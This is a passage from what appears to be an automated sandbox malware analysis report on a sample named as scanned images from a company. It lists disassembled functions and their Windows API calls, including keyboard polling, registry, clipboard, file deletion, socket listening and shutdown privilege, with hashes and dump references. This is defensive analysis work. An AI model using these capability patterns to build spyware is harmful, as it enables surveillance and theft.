                                                        • Opcode Fuzzy Hash: 6b30d9f6a38588e012859a87214a17cbac43ac53c27a2ea740028a7237d119cf
                                                        • Instruction Fuzzy Hash: C631B37650121B6ECF14FBA4EC88ADE77ACAF49360F104276E850A71E0EB70DE55CB64
                                                        Function 00A781F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A78766
                                                          • Part of subcall function 00A7874A: GetLastError.KERNEL32(?,00A7822A,?,?,?), ref: 00A78770
                                                          • Part of subcall function 00A7874A: GetProcessHeap.KERNEL32(00000008,?,?,00A7822A,?,?,?), ref: 00A7877F
                                                          • Part of subcall function 00A7874A: HeapAlloc.KERNEL32(00000000,?,00A7822A,?,?,?), ref: 00A78786
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A7879D
                                                          • Part of subcall function 00A787E7: GetProcessHeap.KERNEL32(00000008,00A78240,00000000,00000000,?,00A78240,?), ref: 00A787F3
                                                          • Part of subcall function 00A787E7: HeapAlloc.KERNEL32(00000000,?,00A78240,?), ref: 00A787FA
                                                          • Part of subcall function 00A787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A78240,?), ref: 00A7880B
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A7825B
                                                        • _memset.LIBCMT ref: 00A78270
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A7828F
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A782A0
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A782DD
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A782F9
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A78316
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A78325
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A7832C
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A7834D
                                                        • CopySid.ADVAPI32(00000000), ref: 00A78354
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A78385
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A783AB
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A783BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 6ac0a9e96fd095a641e680d7bdf321bb7f28a38ca501202c24ea81a376b8bcc5
                                                        • Instruction ID: 3254058be71bb1b44bad31e364a28915d431dcda818d59f034b2724c0723b6e6
                                                        • Opcode Fuzzy Hash: 6ac0a9e96fd095a641e680d7bdf321bb7f28a38ca501202c24ea81a376b8bcc5
                                                        • Instruction Fuzzy Hash: 55616D7194020AAFDF14DF94DD48AEEBBB9FF04700F14C129F819AB291DB399A05DB60
                                                        Function 00A36843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                        • API String ID: 0-4052911093
                                                        • Opcode ID: d0816b622f4d32dd4b2686f0ec602c11eca104808971b252d56d99863bc78e00
                                                        • Instruction ID: 73e9e079a722f94eb83c1a4c13f52d4b77fd8211612918870096f21e989fffe1
                                                        • Opcode Fuzzy Hash: d0816b622f4d32dd4b2686f0ec602c11eca104808971b252d56d99863bc78e00
                                                        • Instruction Fuzzy Hash: DB725D75E002199BDB24CF59C8907AEB7F5FF48710F15C16AE949EB280EB749E81CB90
                                                        Function 00AA0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00AA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0737
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AA07D6
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AA086E
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AA0AAD
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA0ABA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 18343bd950d40883f6fb0dece0968ffb00f761bf21a94228a169dfb8c7fe3604
                                                        • Instruction ID: 67afd206514213d4f7dd0667eefb12beba9dce4e8c59b0d5ff015867d9e6afd5
                                                        • Opcode Fuzzy Hash: 18343bd950d40883f6fb0dece0968ffb00f761bf21a94228a169dfb8c7fe3604
                                                        • Instruction Fuzzy Hash: 51E13C31604211AFCB14DF28C995E2BBBF4EF89754F04896DF48ADB2A1DB31E901CB51
                                                        Function 00A80219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A80241
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A802C2
                                                        • GetKeyState.USER32(000000A0), ref: 00A802DD
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A802F7
                                                        • GetKeyState.USER32(000000A1), ref: 00A8030C
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A80324
                                                        • GetKeyState.USER32(00000011), ref: 00A80336
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A8034E
                                                        • GetKeyState.USER32(00000012), ref: 00A80360
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A80378
                                                        • GetKeyState.USER32(0000005B), ref: 00A8038A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 8351cb299bc0b528de40b45a1eea11326309c3ee0db25507ba065c82621d5e59
                                                        • Instruction ID: 116c0b5cba3debb84fbce4c40d79e18aa5a1a79252b7955c35aa64671b0ad9de
                                                        • Opcode Fuzzy Hash: 8351cb299bc0b528de40b45a1eea11326309c3ee0db25507ba065c82621d5e59
                                                        • Instruction Fuzzy Hash: E841AD349047CA6EFFB5ABA48808BF5BEA0BF12344F08409DD6C55A1C2E7D45DCC8792
                                                        Function 00A986D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • CoInitialize.OLE32 ref: 00A98718
                                                        • CoUninitialize.OLE32 ref: 00A98723
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00AB2BEC,?), ref: 00A98783
                                                        • IIDFromString.OLE32(?,?), ref: 00A987F6
                                                        • VariantInit.OLEAUT32(?), ref: 00A98890
                                                        • VariantClear.OLEAUT32(?), ref: 00A988F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: c4ad920fc682b86eff21ea870db643d055011cc63ca4887b423dbcddb30267ba
                                                        • Instruction ID: 5a9305c173f68f6fff11a0bb209646579bcf350f0577743a0e463492a8ace448
                                                        • Opcode Fuzzy Hash: c4ad920fc682b86eff21ea870db643d055011cc63ca4887b423dbcddb30267ba
                                                        • Instruction Fuzzy Hash: 2661A170708311AFDB10DFA4C944B6BB7E8AF4A754F10481DF9859B291DB78ED44CBA2
                                                        Function 00A94458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: ea80ce4715875b3777b9d2a9cdaa1bf81490bd011fd1ca346da06e263d12f99b
                                                        • Instruction ID: abf55f6c0fc2f42c710a1d471fdc899b6d76339529bf52ae54709a9321e8f580
                                                        • Opcode Fuzzy Hash: ea80ce4715875b3777b9d2a9cdaa1bf81490bd011fd1ca346da06e263d12f99b
                                                        • Instruction Fuzzy Hash: B3219F357006219FDB15EFA4ED49F6A7BA8EF49751F10802AF946DB2A1DB30AC02CB54
                                                        Function 00A83A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                          • Part of subcall function 00A84CD3: GetFileAttributesW.KERNEL32(?,00A83947), ref: 00A84CD4
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A83ADF
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A83B87
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A83B9A
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A83BB7
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A83BD9
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A83BF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 60f7722dc7c7758a37c81c5c2fb584e4fae04fc1e2973c30b32f5e93bb2b80b1
                                                        • Instruction ID: acbeea636d3572edc9f24f31ed0be638e7f6b3b5a770026556ec2deec0056d82
                                                        • Opcode Fuzzy Hash: 60f7722dc7c7758a37c81c5c2fb584e4fae04fc1e2973c30b32f5e93bb2b80b1
                                                        • Instruction Fuzzy Hash: 6A518D728052599ACF15FBE4DE969EDB7B8AF14300F6441A9E44277091EF316F0DCBA0
                                                        Function 00A8F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A8F6AB
                                                        • Sleep.KERNEL32(0000000A), ref: 00A8F6DB
                                                        • _wcscmp.LIBCMT ref: 00A8F6EF
                                                        • _wcscmp.LIBCMT ref: 00A8F70A
                                                        • FindNextFileW.KERNEL32(?,?), ref: 00A8F7A8
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F7BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 7397f5aa2764338236c1c54378eacbcbf367c8ea4ffc529dec4292811b7556c0
                                                        • Instruction ID: d85dd7982ae3b722d5f1c3e0abe50b0d2afa38991072462db845e019617d0d03
                                                        • Opcode Fuzzy Hash: 7397f5aa2764338236c1c54378eacbcbf367c8ea4ffc529dec4292811b7556c0
                                                        • Instruction Fuzzy Hash: 8D416F7190021AAFDF15EFA4DD85AEEBBB4FF05310F144566E815A31A0EB309E54CBA0
                                                        Function 00A34140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: c2bf51fd04eb1d8f63704830b5495fbdb4b384a8f6d5414b2c0d8333928fed7b
                                                        • Instruction ID: b19b306de6c1c34358e9c925b0c2c6d9dd5e3f1b91e19b8b59b9b07874b0517b
                                                        • Opcode Fuzzy Hash: c2bf51fd04eb1d8f63704830b5495fbdb4b384a8f6d5414b2c0d8333928fed7b
                                                        • Instruction Fuzzy Hash: 53A29270E0421ACBDF24CF58C9507ADB7B1FF59314F2486AAE856A7280E774AE85CF50
                                                        Function 00A358C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: f13ec990ed906c953a1e0eacdfa31e9060af4ad1f4c8aa09a2199a0577ffef80
                                                        • Instruction ID: 00a2110ecba4cbaa2859f3a94405131f26556076fcc9ad64996b12580d1cc2e0
                                                        • Opcode Fuzzy Hash: f13ec990ed906c953a1e0eacdfa31e9060af4ad1f4c8aa09a2199a0577ffef80
                                                        • Instruction Fuzzy Hash: 46126B70E00609DFDF14DFA9DA85AAEB7F5FF48300F108669E406A7291EB35AE15CB50
                                                        Function 00A8545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A78CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A78D0D
                                                          • Part of subcall function 00A78CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A78D3A
                                                          • Part of subcall function 00A78CC3: GetLastError.KERNEL32 ref: 00A78D47
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00A8549B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: ff397a7be29697e31fd6157ecdc0df08340f4764591c06f2e212bcd70c87b0d6
                                                        • Instruction ID: a63292cabd5e9eb0bf03bbdcf4cf3f49c524e00dc24f183c9beac906d7ae29ef
                                                        • Opcode Fuzzy Hash: ff397a7be29697e31fd6157ecdc0df08340f4764591c06f2e212bcd70c87b0d6
                                                        • Instruction Fuzzy Hash: 95017B31E94B022EE72CB3B8DC4ABBA7269EB02743F200031FC07D20C3DA644C808390
                                                        Function 00A96596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A965EF
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A965FE
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A9661A
                                                        • listen.WSOCK32(00000000,00000005), ref: 00A96629
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96643
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00A96657
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 50fac723adcf0f5df17c98ded2da64131c88c91d39b53a664205bd541bede674
                                                        • Instruction ID: 2a5ea5bd11f2defb745fae3b58804d9808d55f794101b8a1664bc2d4ecfaa8e1
                                                        • Opcode Fuzzy Hash: 50fac723adcf0f5df17c98ded2da64131c88c91d39b53a664205bd541bede674
                                                        • Instruction Fuzzy Hash: 9221CE307002109FCF14EFA8D985B2EB7F9EF49720F108169E95AA72D1CB30AD02CB50
                                                        Function 00A35680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                        • _memmove.LIBCMT ref: 00A7062F
                                                        • _memmove.LIBCMT ref: 00A70744
                                                        • _memmove.LIBCMT ref: 00A707EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: 452686da09205bab87954cede6119525e3dc437354d1b3b4787c70378d193b65
                                                        • Instruction ID: 8187f0a3b3d8526559d0dd70dbaa54106bb8ec20b5259a95c046c515e8247d3a
                                                        • Opcode Fuzzy Hash: 452686da09205bab87954cede6119525e3dc437354d1b3b4787c70378d193b65
                                                        • Instruction Fuzzy Hash: CB027FB0E00205DBDF04DF68D981AAEBBB5EF84300F14C069F80ADB295EB35DA55DB91
                                                        Function 00A21287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A219FA
                                                        • GetSysColor.USER32(0000000F), ref: 00A21A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 00A21A61
                                                          • Part of subcall function 00A21290: DefDlgProcW.USER32(?,00000020,?), ref: 00A212D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
